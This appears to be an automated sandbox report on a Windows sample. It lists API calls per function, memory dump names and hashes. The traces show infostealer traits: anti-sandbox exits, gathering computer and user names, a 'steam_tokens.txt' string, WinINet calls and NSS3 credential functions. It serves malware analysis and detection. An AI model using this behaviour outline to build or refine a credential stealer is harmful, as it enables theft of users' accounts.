Function 00EE10D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00EF494C), ref: 00EE10EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,00EF494C), ref: 00EE10F2
ExitProcess.KERNEL32 ref: 00EE1103

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 1d5f342d612f72c040f52270070b27166d872cfd68aa2875ec1d2891995a9dba
Instruction ID: 27af650e92118422f099d915ec252ac2cae964970f7916571374499f6fd09ce1
Opcode Fuzzy Hash: 1d5f342d612f72c040f52270070b27166d872cfd68aa2875ec1d2891995a9dba
Instruction Fuzzy Hash: 46E08670D8530CFBEB249B91DD0EB0C76B89B04B06F100098F7097A1C4C6F42A809B59

Function 00EF3CE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF8640: lstrlen.KERNEL32(00000000,?,?,00EF3D93,00EFE4BB,00EFE4BA,?,?,00EF4A46,00000000,?,013214B8,?,00EFE988,?,00000000), ref: 00EF864B
Part of subcall function 00EF8640: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF86A5

lstrlen.KERNEL32(00000000,00000000,00EFE4B7,?,?,?,?,?,?,00EF4222,?), ref: 00EF3D0A

Part of subcall function 00EE4DE0: lstrlen.KERNEL32(00000000), ref: 00EE4E6A
Part of subcall function 00EE4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4EDB
Part of subcall function 00EE4DE0: StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE4EF9

Strings

steam_tokens.txt, xrefs: 00EF3D1F

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 890dea6cf4aa782d382f7aba4b175dc583326453d5e69981ec4215ca3a25b9d1
Instruction ID: 4f1539e9a408a2a22d7ff392f093688618ad79686d42be9fea71764887f59486
Opcode Fuzzy Hash: 890dea6cf4aa782d382f7aba4b175dc583326453d5e69981ec4215ca3a25b9d1
Instruction Fuzzy Hash: A3F03C71C0024C6ACF08FBF0ED578FD77BC9E54340B4062A8FA1672492EF346A0886A6

Function 00EE1120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00EF4947,00EFE4C7), ref: 00EE112A
ExitProcess.KERNEL32 ref: 00EE113E

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 154bf4af6f83335aa2d9fbca8a1224ed61473c96930ca1ba5fdfa6e5437f5e71
Instruction ID: c5d83cc92cd2cc65eda18b6fd89837d4306cb327ede2658c0f915fd67ddaff7f
Opcode Fuzzy Hash: 154bf4af6f83335aa2d9fbca8a1224ed61473c96930ca1ba5fdfa6e5437f5e71
Instruction Fuzzy Hash: 29D05E74D0120CCBCB14DFE099495DDBB7AEB0C711F0004A9DD0572240D6705880CB66

Function 00EEAD00 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EE9800: memcmp.MSVCRT ref: 00EE981B
Part of subcall function 00EE9800: memset.MSVCRT ref: 00EE984E
Part of subcall function 00EE9800: LocalAlloc.KERNEL32(00000040,?), ref: 00EE989E

lstrlen.KERNEL32(00000000), ref: 00EEB1B0
lstrlen.KERNEL32(00000000), ref: 00EEB1C4

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE4DE0: lstrlen.KERNEL32(00000000), ref: 00EE4E6A
Part of subcall function 00EE4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4EDB
Part of subcall function 00EE4DE0: StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE4EF9

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 58357cf5d377d06c706ab1f5ec6ad6421e51975a2fe063be135db672cdc36b5c
Instruction ID: c93d19a4dca9303b13d28ada1b6e05cbf03a29a263000e30cbba01765157bce4
Opcode Fuzzy Hash: 58357cf5d377d06c706ab1f5ec6ad6421e51975a2fe063be135db672cdc36b5c
Instruction Fuzzy Hash: A6E1BF7281011C9ACF19FFA0DD96EFEB379AF54300F5051A9F216B24A1EF746A48CB61

Function 00EEA700 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

lstrlen.KERNEL32(00000000), ref: 00EEA97A
lstrlen.KERNEL32(00000000), ref: 00EEA98E

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE4DE0: lstrlen.KERNEL32(00000000), ref: 00EE4E6A
Part of subcall function 00EE4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4EDB
Part of subcall function 00EE4DE0: StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE4EF9

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 577ec744353c40c6b4b698bb3ddf07eb085178ee9ee025e6505c7d616a1138d4
Instruction ID: 44b30508490db40e928c559ce0cd16b9370c949b343e4fe515b9310ef2b7b60f
Opcode Fuzzy Hash: 577ec744353c40c6b4b698bb3ddf07eb085178ee9ee025e6505c7d616a1138d4
Instruction Fuzzy Hash: CB911D7291010C9BCF19FBA0DD96EFEB3B9AF54300F5051A9F216B2491EF746A48CB61

Function 00EEAA40 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

lstrlen.KERNEL32(00000000), ref: 00EEAC3E
lstrlen.KERNEL32(00000000), ref: 00EEAC52

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE4DE0: lstrlen.KERNEL32(00000000), ref: 00EE4E6A
Part of subcall function 00EE4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4EDB
Part of subcall function 00EE4DE0: StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE4EF9

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: ad74b66781037f10f52f484e93ffb2afe7558e718b9e7b21fdcdbddcdac82e05
Instruction ID: d553e31112ae6de9eb1f15876919a98099db67f65d654b78a22daef20b8ae9a6
Opcode Fuzzy Hash: ad74b66781037f10f52f484e93ffb2afe7558e718b9e7b21fdcdbddcdac82e05
Instruction Fuzzy Hash: 97711C7291011C9BCF18FBA0DD96DFEB3B9AF54300F5065A9B206B6091EF746A48CB61

Function 00EE6070 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00EE67CE,00EE67CE,00003000,00000040), ref: 00EE6116
VirtualAlloc.KERNEL32(00000000,00EE67CE,00003000,00000040), ref: 00EE6163

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4ca42513a54ddb9a1d34e57b06aceee051ae9bec7c31e16583d148ac7debe13f
Instruction ID: 72c2c8291f03f7b583ae5eab5f5322e074594544d7bd13e79e5339a939e9be00
Opcode Fuzzy Hash: 4ca42513a54ddb9a1d34e57b06aceee051ae9bec7c31e16583d148ac7debe13f
Instruction Fuzzy Hash: 4941F834A0020CEFCB54CF99C494BADBBB1FF54354F2492A9E959AB345D731EA81CB84

Function 00EF3C30 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

lstrcat.KERNEL32(?,00000000), ref: 00EF3C6A
lstrcat.KERNEL32(?,0132FF00), ref: 00EF3C88

Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF3579
Part of subcall function 00EF3560: FindFirstFileA.KERNEL32(?,?), ref: 00EF3590

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 77166aa408d472460bac59beb36c950c30fe96878a2106813e1c443d66d54ce0
Instruction ID: 1680552876bce4b5a4f9fa6e7ef728ebe2483442c1398da199dab3eab16e8fc7
Opcode Fuzzy Hash: 77166aa408d472460bac59beb36c950c30fe96878a2106813e1c443d66d54ce0
Instruction Fuzzy Hash: 3601487690020C67CB18FB70DD86DEE737D9B54740F005594B75A66185EEB0AAC88BA1

Function 00EE1060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,00EE110E,?,?,00EF494C), ref: 00EE1073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,00EE110E,?,?,00EF494C), ref: 00EE10B7

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: af41d3ecd93be03ce21b3eba70ab4b420b512c8cc305868540c1a4149ece2c8b
Instruction ID: f6d4b4b149c82fe79a29626908b01341a00394497d46cdbbf9a60f7d922cd7e7
Opcode Fuzzy Hash: af41d3ecd93be03ce21b3eba70ab4b420b512c8cc305868540c1a4149ece2c8b
Instruction Fuzzy Hash: 9BF027B1641208BBE7189AB4AC59FAFF3DCA705B48F305558F940F3280D6B19F40DBA0

Function 00EF6CA0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00EEF807,?,00000000,?,00000000,00EFE783,00EFE782), ref: 00EF6CAF

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3c09cd57569f22c99e9afd6faf0c4da4cb4baa071cf72a33385cff2b864d7dbe
Instruction ID: 67e850e176a15b10b089445e4195ffee9a0724a35dd15b46366b6a5c038954d7
Opcode Fuzzy Hash: 3c09cd57569f22c99e9afd6faf0c4da4cb4baa071cf72a33385cff2b864d7dbe
Instruction Fuzzy Hash: E7F01570C0020CEBCF04EFA4D6596ACBBB4EF00314F1091A9E9A5AB280DB745A49DF81

Function 00EF6CF0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 779662967065147026a62f4b01bea4e2f9cd6cdce9c21e70028a2aae2ad75a1b
Instruction ID: e8a4e2951a2413e5b36f20d359958be4e035437e32c4ac4a1c509079f329f875
Opcode Fuzzy Hash: 779662967065147026a62f4b01bea4e2f9cd6cdce9c21e70028a2aae2ad75a1b
Instruction Fuzzy Hash: E8E0123194034CABEB55DB50CC96FAD737C9B44B01F004294BA0C6A1C0EE70AB858B90

Function 00EE1150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00EF57B0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EF495B), ref: 00EF57E0
Part of subcall function 00EF57B0: HeapAlloc.KERNEL32(00000000,?,?,?,00EF495B), ref: 00EF57E7
Part of subcall function 00EF57B0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EF57FF

Part of subcall function 00EF5720: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE1177), ref: 00EF5750
Part of subcall function 00EF5720: HeapAlloc.KERNEL32(00000000,?,?,?,00EE1177), ref: 00EF5757
Part of subcall function 00EF5720: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF576F

ExitProcess.KERNEL32 ref: 00EE1186

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: d5590306bbc765e9c59aca7ac80891d64f9c9298091762579be56f625dd2d84e
Instruction ID: a3c4d3e1fbe843b51f08f1b340d6e04e6cb878e79c6d90abec09009137372600
Opcode Fuzzy Hash: d5590306bbc765e9c59aca7ac80891d64f9c9298091762579be56f625dd2d84e
Instruction Fuzzy Hash: F4E0C272D0030CA3C95433B16C0AB2A338D8B68309F405465BB04E3143F9B4F4404B61

Function 00EF6800 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00EF6808

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1292bfa60941b60e18b5424d29e6b94a6020068e95656eb870bbd93a3c8bdd9f
Instruction ID: dcd93db99c6e47e162aa3a165e85c690c848b31360fcc0bf58d7ecc0609b4469
Opcode Fuzzy Hash: 1292bfa60941b60e18b5424d29e6b94a6020068e95656eb870bbd93a3c8bdd9f
Instruction Fuzzy Hash: 5DC012B090410CFF8B00CF99E90585977ECDB04200B104194FC0DD3300D532AE148795

Non-executed Functions

Function 6C606E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C752120,6C607E60), ref: 6C606EBC
TlsGetValue.KERNEL32 ref: 6C606EDF
EnterCriticalSection.KERNEL32(?), ref: 6C606EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C606F25

